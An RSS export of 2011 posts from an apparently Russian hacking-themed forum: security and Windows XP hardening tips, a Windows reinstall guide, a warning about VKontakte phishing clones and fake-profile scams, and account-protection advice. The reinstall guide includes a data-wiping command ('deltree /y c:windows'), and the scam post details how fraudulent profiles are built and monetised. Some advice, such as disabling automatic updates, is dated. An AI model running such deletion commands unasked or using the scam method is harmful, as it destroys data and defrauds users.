						&lt;p&gt;6...Резервное копирование информации. Это одно из самых важных правил защиты. Резервное копирование может быть простым и примитивным как перенесение информации на компакт-диски, так и комплексным, в виде регулярного автоматического сохранения данных на отдельном сервере. На системах, требующих перманентной беспрерывной работы, целесообразно установить матрицы RAID (тип дисковой памяти с резервированием и дублированием данных), способные автоматически восстанавливать утерянную информацию. Существуют бесплатные приложения rsync и Bacula, где в произвольной последовательности объединены схемы автоматического резервного копирования. Автоматизированные системы управления версиями программных средств (version control), например Subversion, предоставляют такую гибкую систему контроля данных, что становится возможным не только хранить резервную копию информации на другом компьютере, но также легко управлять несколькими компьютерами с одними и теми же данными без особых проблем. Использование такой системы однажды спасло автора данного очерка во время поломки основного рабочего ноутбука. &lt;/p&gt;
						&lt;p&gt;7...Кодирование сообщений. Криптографические программы для защиты сообщений от посторонних глаз распространены достаточно широко: это приложения, поддерживающие протокол OpenPGP для электронной почты, плагины Off The Record для IM-клиентов, специальное программное обеспечение для продолжительного обмена сообщениями переписки, использующее протоколы SSH и SSL, и многие другие виды приложений, служащие для того, чтобы отсылаемая информация не подверглась риску при передаче. Иногда бывает сложно убедить партнера по переписке в необходимости использования подобных программ, однако в некоторых случаях без них нельзя обойтись. &lt;/p&gt;
						&lt;p&gt;8...Осторожное отношение к чужим сетям. Это особенно важно при работе с открытыми беспроводными сетями, расположенных в кафе, аэропортах, развлекательных центрах и т.п. При достаточной осторожности и осведомленности в вопросах безопасности информации нет причин, по которым нельзя использовать сети в вышеобозначенных местах, в противном случае не стоит доверять системе безопасности этих сетей. В случае подключения к беспроводной сети следует зашифровать частную переписку, и принять меры предосторожности при вводе данных и паролей в формы веб-сайтов. Также следует убедиться в том, что неиспользуемые и уязвимые для атак сетевые службы отключены. Это относится и к сетевым файловым системам типа NFS или Microsoft CIFS, SSH-серверам, службам Active Directory и многим другим. Не помешает полная проверка системы изнутри и снаружи на предмет возможностей, которые могут использовать злоумышленники с целью ее взлома. Каждый пользователь определяет самостоятельно, какие службы следует отключать и какие сообщение при переписке считать необходимыми для шифрования. Защита данных от вредоносных атак при работе с чужой незнакомой сетью может потребовать фактически полного изменения настроек безопасности системы. &lt;/p&gt;
						&lt;p&gt;9...Источник бесперебойного питания. ИБП не только помогает сохранить информацию в случае отключения электричества, но и обеспечивает управление параметрами электропитания и предотвращает нарушение работы файловой системы. Стабилизатора напряжения недостаточно для защиты системы от сильных скачков. ИБП защищает как аппаратную, так и информационную часть. &lt;/p&gt;
						&lt;p&gt;10...Системы мониторинга нарушений и попыток атаки. После проведения всех мер по защите системы не стоит терять бдительность и полагать, что теперь информация находится в полной безопасности. Следует постоянно выявлять подозрительные события на предмет взлома системы и хакерских атак. При этом отслеживания трафика только на сетевом мониторе недостаточно, важно наряду с прочими действиями по увеличению уровня защиты проводить полную проверку входящей информации на каждой машине. &lt;/p&gt;
						&lt;p&gt;Остальные профилактические меры зависят от типа используемой операционной системы. Некоторые из них, вследствие особенностей структуры системы, требуют проведения отдельных процедур по безопасности, другие – хорошей осведомленности в методах защиты только этих платформ, не подходящих для какой-либо других. Все это нужно учитывать как при защите коммерческих операционных систем (Microsoft Windows или Apple Mac OS X), так и при защите систем на основе открытого исходного кода (Linux, FreeBSD, NetBSD или даже OpenBSD).&lt;/p&gt;
						&lt;p&gt;В самых редких случаях бывает достаточно лишь настроек операционной системы по умолчанию без предприятия дальнейших шагов по ее защите. Следуя приведенным выше советам и действуя согласно специфическим особенностям конкретной ОС, у пользователей значительно больше шансов сохранить систему в целостности, чем в случае полного доверия сохранности этой целостности в руки судьбы.&lt;/p&gt;
						&lt;p&gt;Десять советов по обеспечению безопасности Microsoft Windows XP&lt;/p&gt;
						&lt;p&gt;Существуют, разумеется, общие рекомендации по обеспечению компьютерной безопасности, применимые к любым операционным системам, но каждая платформа обладает и своими собственными уязвимостями, на которые стоит обратить особое внимание. Ниже приводятся советы по обеспечению безопасности Microsoft Windows XP.&lt;/p&gt;
						&lt;p&gt;1. Отключите все небезопасные функции. Во всех системах Microsoft Windows по умолчанию включен целый ряд функций, совершенно бесполезных с точки зрения удобства и представляющих существенную угрозу безопасности ОС. Среди них – функция автозапуска (Autorun), учетная запись гостя (Guest) и даже механизм автоматических обновлений (Automatic Update). Позволять неизвестным ребятам из Редмонда решать, когда и какие изменения применять к операционной системе, притом что они не знают, какое в ней установлено программное обеспечение и совместимо ли оно с очередными обновлениями, – идея никуда не годная. Многие функции Microsoft Windows, включенные по умолчанию, оказываются недоработанными в плане компьютерной безопасности или, по крайней мере, совершенно не нужными подавляющему большинству пользователей. Все они представляют потенциальную угрозу системе, поэтому те функции, которыми вы не пользуетесь, следует отключать. &lt;/p&gt;
						&lt;p&gt;2. Отключите все ненужные службы. Вдобавок к бесполезным функциям ОС стоит отключить и все ненужные службы. Почти ровно год назад я опубликовал статью «Десять служб MS Windows XP, которые стоит отключить » (10 services to turn off in MS Windows XP), где приводится краткий список служб, которые следует отключить или хотя бы убедиться, что они действительно нужны. Разумеется, это не исчерпывающий список, но для начала и он подойдет.&lt;/p&gt;
						&lt;p&gt;3. Пользуйтесь надежными приемами защиты электронной почты. Выполняйте хотя бы базовые рекомендации по обеспечению безопасности электронной переписки, чтобы гарантировать, что «плохие парни» не смогут читать ваши письма, не завалят вас с спамом и не будут практиковать на вас технологии фишинга.&lt;/p&gt;
						&lt;p&gt;4. Установите и регулярно обновляйте приложения для защиты от вредоносного ПО. Вредоносное программное обеспечение по-прежнему остается серьезной угрозой для операционных систем Microsoft Windows (по какой бы причине это ни происходило), и в этих условиях оставлять свой компьютер без защиты – просто безответственно. Подходите к выбору антивирусного и антишпионского обеспечения серьезно и основательно. Регулярно обновляйте базу сигнатур своего защитного ПО, потому что оно умеет защищать систему только от тех угроз, которые в состоянии распознать. И не стоит упорно держаться за антивирус, выбранный еще шесть лет назад: в этой отрасли нет такого понятия как марка, которой можно безоговорочно доверять.&lt;/p&gt;
						&lt;p&gt;5. Обновляйте не только операционную систему, но и прочее ПО. Большинство приложений, с которыми работают пользователи Microsoft Windows, поступает от сторонних поставщиков, не имеющих никакого отношения к каналам распространения собственного программного обеспечения Microsoft. А значит, при установке чего-нибудь вроде Adobe Photoshop или Mozilla Firefox за обновлениями безопасности этих продуктов приходится следить отдельно. Ежемесячного обновления Microsoft может оказаться недостаточно: некоторые приложения от сторонних поставщиков нужно тоже обновлять. Чтобы защитить систему действительно надежно, необходимо следить за регулярным обновлением всех установленных программ, потому что в защите нуждаются не только основные компоненты ОС.&lt;/p&gt;
						&lt;p&gt;6. Проверяйте и тестируйте все обновления. С одной стороны, операционную систему необходимо регулярно обновлять и устанавливать все исправления безопасности от Microsoft и других производителей, чтобы устранить существующие уязвимости программного обеспечения. С другой стороны, прежде чем применять любые полученные обновления к рабочей системе, следует изучить их содержимое и испытать их на тестовой машине. Слишком часто пользователям и даже системным администраторам приходится убеждаться в том, что непроверенные обновления оказываются еще хуже, чем их отсутствие: они нарушают нормальное функционирование системы, создают новые уязвимости, а порой даже сводят на нет всю пользу от предыдущих обновлений. Для начала можно просто почитать отзывы других пользователей об очередном обновлении – кто-то наверняка уже его протестировал или установил просто так и сразу же столкнулся со всевозможными проблемами, которых вы благодаря полученным сведениям сможете избежать. И разумеется, прежде чем ставить обновление на рабочий компьютер, необходимо испытать его на тестовой системе, чтобы убедиться, что оно не вызовет никаких проблем в данной конкретной конфигурации.&lt;/p&gt;
						&lt;p&gt;7. Ищите альтернативы стандартному программному обеспечению. Не имеет ли смысла воспользоваться другим браузером (Google Chrome, Mozilla, Opera) вместо стандартного Internet Explorer? Не окажется ли с точки зрения удобства и безопасности многопротокольный IM-клиент Pidgin с шифровальным дополнением OTR лучше «родных» клиентов для AIM, MSN, Y!M, ICQ и gTalk? Единственный способ выяснить это – четко сформулировать свои требования к программному обеспечению, изучить всю доступную информацию и принять обдуманное решение. Не стоит ограничиваться стандартными приложениями, не проанализировав всех последствий такого выбора. &lt;/p&gt;
						&lt;p&gt;8. Пользуйтесь качественным брандмауэром для настольных систем. Хотя во многих отношениях брандмауэры для настольных систем ничем не отличаются от всех прочих пользовательских приложений, они заслуживают особого упоминания в контексте обеспечения безопасности MS Windows. Более того, даже серверы Windows по сути – те же настольные системы, поэтому серверная природа ОС еще не служит достаточным основанием для отказа от надежного «пользовательского» брандмауэра, если есть возможность пожертвовать для него определенной долей ресурсов процессора и оперативной памяти. Ну а для действительно пользовательской операционной системы брандмауэр, разумеется, еще нужнее. Ограничиться стандартными встроенными приложениями – значит, поставить под угрозу безопасность своей системы, даже этого не подозревая. Брандмауэр Windows (Windows Firewall), который входит в состав MS Windows XP начиная с пакета обновлений Service Pack 2, – это, конечно лучше, чем ничего, но существуют и куда более совершенные способы защиты. Ознакомьтесь с альтернативами и выберите брандмауэр, в полной мере удовлетворяющий вашим потребностям. &lt;/p&gt;
						&lt;p&gt;9. Проанализируйте альтернативные варианты, прежде чем останавливать свой выбор на MS Windows XP. К выбору операционных систем применимы те же принципы, что и к выбору отдельных приложений. Разные системы имеют разную степень защищенности и функциональности. Действительно ли вам подходит именно MS Windows XP? Задумывались ли вы о других вариантах – MS Windows 2000 или Vista, а может быть, даже MacOS X, FreeBSD или Ubuntu Linux для настольной системы и OpenBSD, OpenSolaris или OpenVMS для сервера?&lt;/p&gt;
						&lt;p&gt;10. Пользуйтесь стандартными приемами защиты, которые действуют вне зависимости от специфики операционной системы. В своей прошлогодней статье «10 советов по защите операционных систем» (10 security tips for all general-purpose OSes) я перечислил ряд рекомендаций, которые помогают повысить степень защищенности любой операционной системы общего назначения, в том числе, MS Windows. &lt;/p&gt;
						&lt;p&gt;Для полноценного пользования MS Windows XP недостаточно ее просто установить. Это только первый шаг, и если на нем остановиться, незащищенная система окажется открытой ко всевозможным потенциальным угрозам, существующим на просторах Интернета. Не ленитесь надежно защитить себя и свой компьютер от вездесущих опасностей!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 17:42:48 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=6#p6</guid>
		</item>
		<item>
			<title>ПЕРЕУСТАНОВКА ОПЕРАЦИОННОЙ СИСТЕМЫ</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;С течением времени операционная система Windows теряет стабильность. Так что если компьютер работает более двух лет, то ждите, что в один прекрасный момент вы смиритесь с необходимостью переустановить Windows с нуля. Однако вопреки распространенному убеждению, вам не потребуется переформатировать жесткий диск, за одним лишь исключением, речь о котором пойдет впереди. Все то скверное, от чего нужно избавиться, находится в папке Windows.&lt;/p&gt;
						&lt;p&gt;Перед тем как приступить к делу, подготовьте компакт-диски с дистрибутивами Windows и приложений. На всякий случай создайте резервные копии файлов данных и высвободите для работы два дня. Если все будет хорошо, то вы переустановите систему за несколько часов, однако будьте готовы к всяким заминкам: может быть, вы не сумеете найти нужный компакт-диск или же данных не окажется там, где они, по вашему разумению, должны быть, а то и просто что-нибудь откажется работать.&lt;/p&gt;
						&lt;p&gt;Можно как восстановить ОС Windows (repair reinstall), так и полностью переустановить ее. Восстановление позволяет сохранить текущие параметры, тогда как полная переустановка предоставляет по-настоящему свежую версию ОС. Процедуры восстановления просты и не занимают много времени, но проблем они решают куда меньше. Приведенные ниже инструкции относятся к полному восстановлению.&lt;/p&gt;
						&lt;p&gt;Восстановительный компакт-диск производителя ПК&lt;/p&gt;
						&lt;p&gt;Большинство компьютеров поставляются с оригинальным восстановительным диском производителя (restore, или recovery CD-ROM), а не с компакт-диском Microsoft Windows. Если же компьютер достался вам с последним или вы отдельно купили копию Windows, то переходите к разделу, относящемуся к установленной на вашем ПК версии операционной системы.&lt;/p&gt;
						&lt;p&gt;Одни из восстановительных компакт-дисков предоставляют все возможности полного комплекта Microsoft Windows, да к тому же еще с лучшими инструкциями и драйверами для всего оборудования. Другие же не умеют ничего, кроме как переформатировать жесткий диск и вернуть его в такое состояние, в каком он пребывал в момент приобретения ПК. (Это как раз и есть то упомянутое выше исключение, предполагающее переформатирование.)&lt;/p&gt;
						&lt;p&gt;Если восстановительный CD позволяет только переформатировать жесткий диск, то до начала переустановки Windows создайте резервную копию данных где-нибудь в сети или на съемном носителе. В случае использования Windows 98 либо Me скопируйте папку C:Мои документы, а также папки внутри C:Windows, о которых будет сказано ниже. Если же вы работаете в среде Windows 2000 или XP, то создайте резервную копию папки C:Documents and Settings. Разумеется, надо скопировать и другие папки, где вы храните свои файлы данных.&lt;/p&gt;
						&lt;p&gt;Компакт-диски Windows 98 и Me&lt;/p&gt;
						&lt;p&gt;Эти версии ОС хранят некоторые важные данные в папке Windows, которую вскоре предстоит стереть, так что скопируйте часть ее подпапок в какое-нибудь другое место. Щелкните правой кнопкой на значке «Мой компьютер» и выберите «Проводник». Дважды щелкните на значке диска C: (в Me, возможно, придется потом еще выбрать опцию «Просмотреть все содержимое этого диска» (View the entire content of this drive)). Щелкните правой кнопкой на правой створке окна и укажите «Создать•Папку». Назовите новую папку, скажем, oldstuff («старые материалы»).&lt;/p&gt;
						&lt;p&gt;Теперь отправляйтесь к папке Windows (возможно, вам опять придется выбрать опцию «Просмотреть все содержимое этого диска»), нажмите клавишу и, удерживая ее, выделите следующие папки: All Users, Application data, Local Settings, Profiles, SendTo, «Главное меню» (Start Menu), «Избранное» (Favorites) и «Рабочий стол» (Desktop). Если вы не увидите все эти папки, укажите «Вид•Свойства папки» («Сервис•Свойства папки» в Me), щелкните на закладке «Вид», отметьте опцию «Показать все файлы» и затем нажмите на OK. (Если вы все равно не видите все папки, то не волнуйтесь по этому поводу.) Нажмите и перетащите выделенные папки в C:oldstuff&lt;/p&gt;
						&lt;p&gt;Как переустановить Windows без потери данных&lt;/p&gt;
						&lt;p&gt;Перед тем как переустанавливать операционную систему, переместите эти папки в специально заведенную папку oldstuff&lt;/p&gt;
						&lt;p&gt;Перезагрузите Windows с помощью загрузочного диска. (Чтобы его сделать, вставьте чистую дискету в дисковод, задайте опции «Пуск•Настройка•Панель управления», щелкните на значке «Установка и удаление программ», далее на закладке «Загрузочный диск» нажмите кнопку «Создать диск», а потом следуйте указаниям на экране.) В меню запуска отметьте вариант «Запустить компьютер с поддержкой CD-ROM». Когда драйверы будут загружены, вставьте в дисковод компакт-диск с дистрибутивом Windows.&lt;/p&gt;
						&lt;p&gt;Если вы выполняете не только восстановление Windows, то введите командную строку c:windows commanddeltree /y c:windows и нажмите . Удаление старых файлов потребует определенного времени, но наличие переключателя /y отменяет запросы на подтверждение, так что вы можете перевести дух. Когда вы снова увидите приглашение A:, то введите команду x:setup, где x — буква дисковода компакт-дисков (скорее всего, следующая за той, которая была приписана этому дисководу в Windows, — если в Windows это была D:, то здесь, вероятно, будет E:). Нажмите и следуйте экранным указаниям.&lt;/p&gt;
						&lt;p&gt;Снова оказавшись в Windows, переустановите драйвер графической платы. Если система была настроена на более чем одного пользователя, то восстановите каждую учетную запись. Для этого укажите опции «Пуск•Настройка•Панель управления•Пользователи». Важно, чтобы имена пользователей были теми же, что и при предыдущей установке. Если у вас нет уверенности на сей счет, откройте Проводник и отправляйтесь на C:oldstuffprofiles. Там вы найдете папку для каждого зарегистрированного имени пользователя. О паролях не беспокойтесь. Выйдите из системы и снова войдите в нее от имени каждого пользователя. Сделав это, повторите путь, но теперь нажмите , вместо того чтобы указывать имя пользователя и пароль.&lt;/p&gt;
						&lt;p&gt;Как переустановить Windows без потери данных&lt;/p&gt;
						&lt;p&gt;После переустановки Windows XP заново создайте учетные записи пользователей с теми же именами, которые они имели ранее&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Задайте «Пуск•Программы•Сеанс MS-DOS» (в Windows 98) или «Пуск• Программы•Стандартные•Сеанс MS-DOS» (в Windows Me). Введите последовательность xcopy c:oldstuff*.* c:windows /s /h/ /r и нажмите . (Чтобы узнать, что делают переключатели команды xcopy, введите xcopy /?) Увидев вопрос, надо ли переписывать файл, нажмите клавишу a, чтобы переписались все файлы.&lt;/p&gt;
						&lt;p&gt;По завершении работы xcopy перезагрузите ПК и войдите в систему (если потребуется, то в качестве какого-либо конкретного пользователя). Откройте папку «Мои документы», дабы удостовериться, что все личные файлы, включая избранное в Internet Explorer и ярлыки Главного меню, находятся там, где им и надлежит быть. В заключение перейдите к разделу «Завершение работы».&lt;/p&gt;
						&lt;p&gt;Компакт-диски Windows 2000 и XP&lt;/p&gt;
						&lt;p&gt;Загрузите ПК с компакт-диска Windows. Получив сообщение Press any key to boot from CD («Нажмите любую клавишу для загрузки с CD»), выполните это действие. (Если перед запуском Windows вы не увидите данного сообщения, перезапустите компьютер, нажмите указанную на экране клавишу для входа в Setup — программу первоначальной установки параметров — и измените порядок загрузки таким образом, чтобы CD оказался на первом месте.)&lt;/p&gt;
						&lt;p&gt;Когда покажется приветственный экран Welcome to Setup, нажмите . Опция R (repair) переносит вас в восстановительный модуль (Repair Module), что полезно, если ОС не хочет загружаться. Вскоре вам будет выдано сообщение о том, что Windows на вашем компьютере уже установлена. Теперь нажмите либо R, чтобы выполнялось восстановление, либо , чтобы проводилась полная переустановка системы с удалением старой версии. Для полного восстановления выберите раздел C: и нажмите . Получив предупреждение о том, что операционная система находится в этом же разделе, нажмите клавишу C (латинское). Будучи спрошенным о предпочтениях для указанного раздела, выберите вариант Leave the current file system intact (no changes) — «Оставить существующую файловую систему без изменений». Прочитав сообщение о том, что папка Windows (или папка Winnt в случае Windows 2000) уже существует, нажмите клавишу l («эль»), чтобы удалить ее и создать новую. Далее следуйте экранным указаниям. Когда инсталляционная программа спросит имя, введите temp.&lt;/p&gt;
						&lt;p&gt;По завершении установки система загрузится в Windows и вы будете зарегистрированы в ней как пользователь по имени Temp. Если экран будет невразумительным, переустановите драйвер графической платы.&lt;/p&gt;
						&lt;p&gt;При переустановке Windows XP переходите далее к разделу «Инструкции, общие для Windows XP и 2000». В случае переустановки Windows 2000 выйдите из системы в качестве пользователя Temp и снова войдите в нее как Администратор. Теперь еще раз проделайте это. Откройте Проводник и отправляйтесь к папке C: Documents and Settings. Одна из ее подпапок будет называться «Администратор», а другая — как-то наподобие Администратор.имя-компьютера.&lt;/p&gt;
						&lt;p&gt;Теперь укажите опции «Пуск•Программы•Стандартные•Командная строка». Введите последовательность cd «documents and settings» и нажмите . Далее введите xcopy администратор*.* администратор.имя-компьютера /s /h /r /s, подставив вместо переменной «имя-компьютера» последнюю часть имени этой папки в Documents and Settings. Потом нажмите и, будучи спрошенным насчет того, нужно ли переписывать файлы или папки, выберите ответ a, чтобы они все были переписаны (All).&lt;/p&gt;
						&lt;p&gt;Если ранее имелись какие-либо другие пользователи помимо Администратора, то продолжайте действовать, как сказано в разделе «Инструкции, общие для Windows XP и 2000». В противном случае раскройте Проводник и убедитесь, что ваши файлы данных находятся там, где следует. Затем отправляйтесь к приложению «Пользователи и пароли» (на Панели управления) и удалите учетную запись Temp, прежде чем переходить к разделу «Завершение работы».&lt;/p&gt;
						&lt;p&gt;Инструкции, общие для Windows XP и 2000&lt;/p&gt;
						&lt;p&gt;Откройте Проводник. Выделите диск C: (возможно, вам придется нажать на Show the contents of this folder («Показать содержимое этой папки»)). Щелкните на правой створке окна Проводника и задайте опции «Создать•Папку». Присвойте новой папке какое-нибудь наглядное имя, например oldstuff («старые материалы»). На левой створке выберите папку Documents and Settings. В ней должны содержаться подпапки для каждого из пользователей, имевших доступ к ПК при предыдущей установке, плюс папка Temp и еще несколько других. Переместите папки, названные именами прежних пользователей, в oldstuff.&lt;/p&gt;
						&lt;p&gt;Теперь укажите опции «Пуск•Панель управления•Учетные записи пользователей» («Пуск•Настройка•Панель управления• Пользователи и пароли» в Windows 2000). Создайте учетные записи для всех пользователей, зарегистрированных в системе еще до переустановки. Не ошибитесь в именах; они должны быть такими же, как имена папок, только что перемещенных вами в oldstuff (рис. 2). В Windows XP хотя бы один из пользователей должен обладать привилегиями администратора.&lt;/p&gt;
						&lt;p&gt;Выходите из системы и снова входите в нее в качестве каждого из пользователей перед тем, как опять входить в нее под именем Temp. Не забудьте, что в диалоговом окне выхода из Windows XP вам нужно выбрать именно выход, а не смену пользователей (к Windows 2000 это не относится).&lt;/p&gt;
						&lt;p&gt;Теперь войдите в систему как Temp, задайте опции «Пуск•Программы•Стандартные•Командная строка» (в XP — «Пуск•Все программы• Стандартные•Командная строка»), введите последовательность xcopy c:oldstuff*.* «c:documents and settings» /s /h /r /c и щелкните на . А когда увидите запрос насчет того, хотите ли вы переписать файл, то нажмите а. Выйдите из системы и заходите в нее, поочередно используя каждую из зарегистрированных учетных записей, дабы удостовериться, что все данные находятся там, где нужно. Потом зайдите в систему как Администратор и запустите расположенное на Панели управления приложение «Учетные записи пользователей», чтобы удалить запись Temp.&lt;/p&gt;
						&lt;p&gt;Завершение работы&lt;/p&gt;
						&lt;p&gt;Теперь у вас есть работающая операционная система Windows, но мало чего сверх того. Вам еще нужно переустановить принтер, звуковую плату и т.д. К счастью, если драйвер для того или иного устройства имеется на компакт-диске Windows или восстановительном диске производителя ПК, он, вероятно, уже автоматически переустановился.&lt;/p&gt;
						&lt;p&gt;Чтобы заново «представить» приложения операционной системе, их придется переустановить. Некоторые из параметров приложений переустановка не затрагивает, но вот те, что хранились в Реестре, были стерты.&lt;/p&gt;
						&lt;p&gt;После подключения к Интернету отправляйтесь на сайт windowsupdate. microsoft.com и перепишите оттуда все критические обновления для установленной на ПК версии Windows. Затем посетите сайты производителей введенного оборудования и обновите соответствующие драйверы&lt;/p&gt;
						&lt;p&gt;Как переустановить Windows без потери данных&lt;/p&gt;
						&lt;p&gt;По окончании переустановки Windows отправляйтесь на сайт Microsoft Windows Update&lt;/p&gt;
						&lt;p&gt;После переустановки отдельные данные могут не появиться там, где им следует быть. Проверьте, не скрываются ли они в папках Application Data и oldstuff, и посмотрите, не удастся ли переместить эти данные в ту папку, где их ищут Windows или ваши приложения. Если вы обнаружите папку под названием Identities с двумя подпапками в ней, имена которых будут длинными и не поддающимися расшифровке, попытайтесь переместить содержимое одной из этих папок в другую и выясните, не появятся ли ваши данные снова.&lt;/p&gt;
						&lt;p&gt;Вы, наверное, уже догадались, что заключительным шагом будет удаление папки c:oldstuff и папки Администратор в Windows 2000. Однако сделайте это в самую последнюю очередь. Подождите несколько дней, недель или даже месяцев, чтобы окончательно увериться в том, что все нужные вам файлы доступны.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 17:37:16 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>ФЕЙК АНКЕТЫ ВКОНТАКТЕ</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;Кто такой фейк? Что это такое? Ф. в контакте.&lt;/p&gt;
						&lt;p&gt;Слово &amp;quot;фейк&amp;quot; (произносится &amp;quot;фэйк&amp;quot;) понимается по-разному, и применительно к вконтакте существует 2 его толкования. Сейчас мы попробуем разъяснить вам, что такое фейк.&lt;br /&gt;Fake [feik] - подделка (англ.).&lt;br /&gt;1-ое значение слова &amp;quot;фейк&amp;quot; - это сайт, имеющий название, очень похожее на vkontakte.ru, например &amp;quot;vkontlakte.ru&amp;quot;, главная страница которого ничем не отличается от главной страницы Вконтакте.ру. НО!!! Фэйк создаётся с целью кражи ваших паролей. Если вы не заметите отличие в одном символе, то наверняка решите, что это и есть настоящий сайт, введёте свой логин/пароль и... окажетесь взломаны. Эти логин и пароль будут записаны в базу спамеров, и в тот же день или в ближайшие дни ваш аккаунт на настоящем Вконтакте.ру начнёт рассылать спам. Обычно всякую порнуху.&lt;br /&gt;2-ое значение этого слова связано с поддельными аккаунтами и применяется не только в вконтакте, а на любом сайте, где есть регистрация. Фейковый аккаунт - это анкета, представляющая либо несуществующего человека, либо существующего, но эту анкету создал или содержит вовсе не тот, кого она представляет. Слишком сложно? Сейчас объясню попроще...&lt;br /&gt;Что такое фейк в контакте? Спамеры любят рекламировать свои сайты на страничках ВК. Какие странички наиболее популярны? Конечно же симпатичных девушек!!! Поэтому, спамеры поступают следующим образом.&lt;br /&gt;# Находят моделей, часто даже нанимают за деньги, которые фотографируются для них где угодно: в парке, саду, дома, в машине, в клубе, на кровати, в обнимку с друзьями, в разной одежде, в откровенной одежде, вызывающих позах и вообще как угодно... Почти всегда им либо дают бумажку с надписью &amp;quot;Я не фейк&amp;quot; и фотографируют так, либо за отдельную плату сажают перед камерой и записывают видео 2-5 минут, где девушка подробно объясняет, что она не фикция, она настоящая, имеет свой аккаунт в контакте и даже помнит свой ID, что она сама страдает от фейков (типа &amp;quot;мои фотки качает школота и штампует фейки. Ну и фак им в *опу&amp;quot;). На этом её дебют кончается, ей платят гонорар и отпускают с миром.&lt;br /&gt;# Спамеры регистрируют новый аккаунт, загружают туда часть фоток этой девушки (ЧАСТЬ ФОТОК!!! НЕ ВСЕ!!!). Заполняют анкету различной скопипиз.... то есть, скопипастенной (ctrl+c, ctrl+v) информацией. Очень часто на украденные прежде голоса дарят только что созданной подделке подарок. Всё это делается для правдоподобия. Обязательно загружают фото и видео, где девушка доказывает, что она не фейк, даже наоборот страдает от того, что из неё делают фэйки, а это настоящий акк.&lt;br /&gt;# В нескольких местах вставляют нужную им рекламу. Типа &amp;quot;домашняя страничка&amp;quot;, заметки или &amp;quot;кто мне друг, установите это приложение: &amp;lt;...ссылка...&amp;gt;&amp;quot;.&lt;br /&gt;# Затем сами со своих аккаунтов (которых может быть десятки и даже сотни) пишут комментарии в заметках и фотографиях, письма на стене и так далее. Чтобы создавалась иллюзия, что это реальная девушка и ей реально интересуются её друзья и знакомые.&lt;br /&gt;# Затем эта фейковая девушка заходит в различные приложения или на другие сайты, где даёт ссылки на свою анкету. Часто такой она &amp;quot;делает&amp;quot; сигны за голоса. Умеет отвечать на ЛС, то есть с волосатым грязным мужиком, который управляет ей, можно договориться, на какой части тела и за сколько голосов делать сигну. За голоса также &amp;quot;девушка&amp;quot; предлагает виртуальный секс (вирт).&lt;br /&gt;# Жертва переводит ей голоса. Но вместо того, чтобы заниматься виртом/делать сигну, &amp;quot;она&amp;quot; ставит жертву в чёрный список. И жертва теперь даже не может написать фейку ЛС, зайти на её страницу и предупредить других пользователей, что это кидалово.&lt;br /&gt;# На полученные мошенничеством голоса фейк повышает свою репутацию. Чем выше у анкеты репутация, тем больше пользователей натыкаются на этот аккаунт в результатах поиска людей вконтакте, тем больше посещаемость страницы и тем больше кликов по рекламируемому порносайту или больше лохов, разведённых на голоса.&lt;br /&gt;# Время от времени добавляет в свой альбом те фотографии, которые были сделаны ещё тогда... (помните, я писал, что при создании фейка выкладываются не все фотки???). Разумеется, эти фото выдаются за свежие, хотя им может быть несколько лет. И люди верят... Люди думают, что не настоящие девушки не умеют обновлять альбомы. Люди думают, что фейк создаётся 1 раз и больше альбомы не обновляет. Ан нет...&lt;br /&gt;Вам кажется, что процесс создания фейка очень трудоёмкий? Да, вы правы. Ведь нужно найти модель, скопипастить очень много текста, &amp;quot;ухаживать&amp;quot; за поделкой, обновлять альбомы, общаться с потенциальными лохами, отвечая им на ЛС. НО!!! Все эти расходы окупаются, причём в разы!!! Фейковый бизнес приносит очень высокие доходы, ведь каждый день хорошо раскрученный fake может приносит до нескольких десятков голосов и до нескольких тысяч кликов по рекламным ссылкам! У спамеров заказывают рекламу, которая появляется в анкетах фейков.&lt;br /&gt;Так что, будьте бдительны: они очень хорошо маскируются!!!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 17:20:21 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>как обезопасить свою анкету от взлома</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;/span&gt;В этой статье описаны самые распространенные способы взлома аккаунтов вконтакте.&lt;br /&gt;Вы узнаете, как хакеры ломают страницы вконтакте, а также, как защитить от взлома вашу страницу.&lt;br /&gt;Как ломают пароли вконтакте.&lt;br /&gt;По причине роста популярности ВКонтакте, последние время участились случаи взлома станиц пользователей этой социальной сети.&lt;br /&gt;Цели у хакеров разные - это спам, увеличение рейтинга и т.д. Но часто взломщиками становятся ваши знакомые и друзья. &lt;/p&gt;
						&lt;p&gt;Путей взлома аккаунтов ВКонтакте тоже есть несколько.&lt;br /&gt;Я расскажу о самых распространенных:&lt;/p&gt;
						&lt;p&gt;1. Взлом через e-mail.&lt;br /&gt;Как известно, пароль от контакта можно получить по почте, на которую зарегистрирован аккаунт. Для этого используется функция восстановления пароля.&lt;br /&gt;Зачастую, взломать почтовый ящик проще, чем анкету контакта, поэтому отнеситесь внимательно к безопасности своей почты - придумывайте сложный пароль.&lt;br /&gt;Внимательно отнеситесь к составлению секретного вопроса. Ответ на него должны знать только вы, а ваши друзья не должны суметь ответить на секретный вопрос.&lt;br /&gt;Лучше всего будет, если сам адрес почты, на который зарегистрирован ваш аккаунт вконтакте, будет зарегистрирован отдельно и не будет являться вашим основным e-mail’ом.&lt;br /&gt;Не стоит говорить о нем вашим знакомым, храните его как и пароль, в секрете.&lt;br /&gt;Тогда задача взломщика сильно усложнится.&lt;/p&gt;
